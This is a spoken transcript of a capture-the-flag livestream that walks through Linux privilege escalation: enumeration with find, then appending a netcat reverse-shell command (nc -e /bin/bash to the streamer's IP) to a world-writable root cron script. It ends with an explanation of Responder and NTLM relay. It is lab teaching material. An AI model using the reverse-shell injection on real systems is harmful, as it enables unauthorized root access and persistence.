All right. I am back. My couch has been delivered. That took way longer than I was expecting it to, but everything's good now. So let's do the Priv Esc. Hopefully this will work out okay too. I'll just have two different videos for the stream, and that'll be fine. So let's see here. When last we left our intrepid heroes, we got an unrestricted shell. Which is nice. So we can, like run any random command like zdiff, if we ran it correctly or whatever. But so now we need to figure out how to Priv Esc. And the first things we would do normally is like sudo -l, and it's like, what the hell is sudo? I don't know what that is. So if we go to Etsy, look for Etsy sudoers. We do not have a sudoers, so I guess sudo doesn't actually exist on the system. So that's my first guess, right? What's my next guess? Let's go to cron. So we're in Etsy, so a lsal, I think R, cron. Is there cron at all here? Oop. So we do have cron dot stuff here. So if we lsal cron star, weird. Is it just like our version of bash or whatever not understand stars? Maybe that's because we're not in a we're in a TTY but not a good TTY. So okay, fine. lsal. God damn it. Okay. So cron.d, cd cron.d. Cron tab -l. No cron tab for Mindy. Okay, so cron's not how we're going to Priv Esc. The next thing I would do is we're going to find in root, we're going to look for, let's see, writable. I forget how they spell writable. I am not a English major. Writable. I got it right here. Cool. Writable. We'll perm 4000. See what comes up. Oh god, don't do that. No. Okay. So we're gonna find in root. We're gonna find writable. Perm 4000. And we're gonna 2 into dev null. That's standard error. We're going to redirect standard error into dev null because we don't want to see all this permission denied crap. Nothing. So find writable user root. I think that syntax works. If not, we'll check it. Oh my gosh. So there's a bunch of stuff here. So we'll need find writable executable user root. I didn't do the thing. Writable executable user root 2 into dev null. Opt temp.py. Okay, that's interesting because this is, these are devices. There's some random stuff in var, some stuff in temp, but all of this looks like system stuff, right? This opt temp.py looks interesting. So let's go into opt cat temp.py. So if we do a al, we can see read write execute temp.py. OS system. So it's removing So rm minus r temp. So what this says to me, you'll see scripts kind of like this, where scripts will go in and remove everything from temp, or, you'll see it like cleaning up stuff from var, like log files from var and stuff like that. So So you'll see stuff like this in the wild. I saw that sudo man said, is there a way to suppress the permission denied from find? And hopefully I answered that for you. But for people that didn't follow along with what I was typing earlier, when I did the find and then it was like perm 4000 or whatever, and then I did that to dev null. So I think, I'm sure man followed along with this, but for those of you who didn't actually know what this syntax is doing, so in Linux we have various, call them IO channels. One is standard out, so the stuff that gets displayed from a command, this is standard out. The stuff that gets displayed to an error, like permission denied, or sysexit error code 2 or anything like that, that's IO channel 2. And so that's standard error. And then there's a couple others too, but 1 and 2 are the main ones that we deal with. And so what this syntax is saying is that I want to take channel 2, the standard error, I want to redirect it, that's the arrow, I want to direct it into dev null, which essentially means put it into nothingness. I don't want to see it, I don't want to hear about it, I don't want it written to disk, I don't want anything. So, normally you'd see this kind of syntax if you like echo foo into temp bar, right? And if we cat temp bar, and we see foo. So this is just a redirect. It's doing like exactly the same thing, except it's taking the dev or the standard error output and then just redirecting it to dev null. So we'll see scripts like this, and these kind of scripts, like I said, are common for, admins will set these up because they're sick of their disks filling up with like logs and var log, or, users filling up temp randomly because they're weird and users are weird. So you'll see this stuff. And so what this says to me, having been a previous Linux administrator, and God knows I've probably done this, even though I'd like to say that I hadn't. I'm sure I did this as an administrator. But this is probably croned. There's probably a cron job like every minute or so, or however often, even 30 seconds or so, that goes in and it just runs this, right? So what's crazy is that it's 777. Somebody chmoded this to 777 because they don't really understand how permissions work. And what that means is that we've got read, write, and execute bits set for owner, which is root, group, which is root, and everyone else, which is us. So we can VI, actually, do we want a VI? Let's just do this. Can we, do we want a chance VI? We can probably do VI because we're in a TTY, right? This is going to be terrible, but attempt up high. No. Oh, God. Ugh. I hate this. Okay, so there's a couple things we can do here. One, we could set up like an actual decent, TTY, which I don't feel like doing. Two, we can use like set awk or set, I think will actually do it, where we can like find this line and then replace it, which is, another way to do things. If we just, actually, if we just, let's see, if we echoed os.system nc, and then what is my quest to find the Holy Grail? See, it's topical humor because we're writing Python right now. So we'll echo os.system nc e or bin nc.traditional e bin bash to this, and instead of 9090, we'll do 9091. And then we'll append that. The double arrows append. If we did a single arrow, that would stomp on this file rather than appending it. Like if we just did this, then line 1 would be this, and then that would be it. But we'll append it to the end. So after it gets done running all of, or removing everything from temp, it will, it'll run this command for us. So, and we'll do that into temp.py. Oops. Bash error. Oh, crap. We should do that differently. If we do OS, so if we do the single quotes, I believe it's okay with this. Let's see if we do it backwards. Bin bash 10, 10, 14, 16, 90, 91, temp.py. Yes, so if we cat temp.py. So the reason for that, by the way, is that single quotes and double quotes are actually handled slightly differently in bash. And single quotes will often like hard quote things. So you don't have to like escape parentheses and stuff like that, whereas double quotes won't. And there's a lot of intricacies in there, and I'm not going to go too deep into that functionality because I don't want to state it incorrectly, but it's one of those things that I generally look up half the time. So that's there. Let's get our next NC NLP, and we're going to listen on 9091. So this will take a minute. I'm trying to remember how long it took, or if this will even work is another problem. So what we can do is if we go over here, we'll set another one, and we will watch LSOF, and we'll just do this. And every 1 second, we'll do LSOF minus I dash P. IP grep 9091, and this will show us the output. Watch just shows us, like, watch is a command. It runs a command every so often. The minus n shows us number of seconds. So since I set it to 1, it just does it every second. You can see it counting up here. So all we're doing is watching the output of LSOF, which is list open file. The minus I shows us network connections, and then P, the capital P, shows us the port rather than, you know, whatever name of the port that it is aware of here. And so we're grepping 9091 because that's the one that we told it to connect to us on. So from that output, you can see that we've got a netcat listener on 9091. It should show us the connection to us, which we haven't gotten one yet. So we'll let that sit for a couple minutes. I have a question from Nathan. Do you do any malware analysis, reverse engineering? Here we go. And so now you can see that instead of listening, we actually have a connection established. And then here's the outputs for the commands. I guess it stored it in buffer or something, and it ran it. So now we've got root. And, you know, we can cat root.txt if we wanted, which we're not going to because you've been following along or whatever. But I'll let you guys do that. And I guess we got disconnected. Maybe somebody else did the same thing, or maybe it timed out, or who knows what just happened. But it doesn't matter. We got our root. From there, we could have, you know, uploaded other malware or other shells or gained some sort of persistence or whatever. This is the important part. That's another important part. And that's our Priv Esc. So Nathan asked, do I do any malware analysis / reversing? Not well. we'll say. I've done a little bit of analysis here and there. I'm pretty bad with assembly. It's a skill set that I'm working on, but primarily I focus on like network pen tests, web app pen test, network forensics a little more than like actual malware forensics, like system forensics, memory forensics. But yeah, so network forensics, I guess, is the closest I'll get to that. I'm pretty good at dissecting packets, more so than trying to reverse like actual code. I don't have any development background at all. But so that's that. That's the stream. It you know, was longer than I was expecting to, especially with that big break in the middle. But you know, it was also relatively short. It's not one of our 3-hour marathons, but I think it was a fun box. There's a lot of stuff there. We didn't use any metasploit. We did a lot of enumeration and service exploration and figuring out how things actually work to get our initial access and then our root access. So hopefully everybody had fun. Hopefully everybody learned some stuff. I acquired a couch, and I'm sure that's exciting for everyone. But oh, I want to call attention to the IPSEC earlier in the stream. While I was on my break, he gave us a breakdown of a much better responder response than I gave, and so I'll read it out just to not leave people hanging. What he said is Windows uses NetBIOS as a backup if DNS server says something that doesn't exist. So NetBIOS sends an LLMNR request, which is like a peer-to-peer DNS request. Anyone can answer that and say it's them. Responder answers that and asks the computer to authenticate to them and then captures that hash. Additionally, a responder can also do a relay attack if NTLM signing isn't on. And that's when you essentially forward the login request to another server and let them authenticate for you, then drop them from the conversation. So it's a much better, more detailed response than what I gave earlier, but that's essentially what I was trying to get at with my earlier response. And I've actually seen pen testers do that in environments that I've managed. So it's pretty insidious. It's definitely something that you want to keep an eye out for. The way to get rid of that is to disable NetBIOS, which stops responder a lot. But if DNS isn't working correctly, then it can break stuff. So, you know, a lot of people don't disable it. I've tried to get rid of it in environments, but, you know, various admins get upset, or, you know, don't necessarily like when you do that. So it's kind of a, you know, fight, you know, it's an uphill battle, we'll call it. But anyways, thanks for joining me. I hope everybody had a lot of fun. I hope you learned stuff. As always, I am _R00K_ on Twitter. Feel free to follow me, get announcements for the next stream. You can also subscribe to me and get alerts when I start my stream, but I try and do, you know, I try and at least do once a month, more frequently twice a month. Sometimes I even do things 2 weeks in a row, just like this week and last week. So I think the next video is going to be on exploitation. It'll be a follow-up to last week's recon video. So it'll be more about process and various capabilities that you can do rather than, you know, like actual walkthroughs of a machine like this, where it's, you know, teaching by example. This is more theory and process. So hope to see you then. I'm not sure if it'll be next weekend, but it should be in the next couple weeks. And until next time.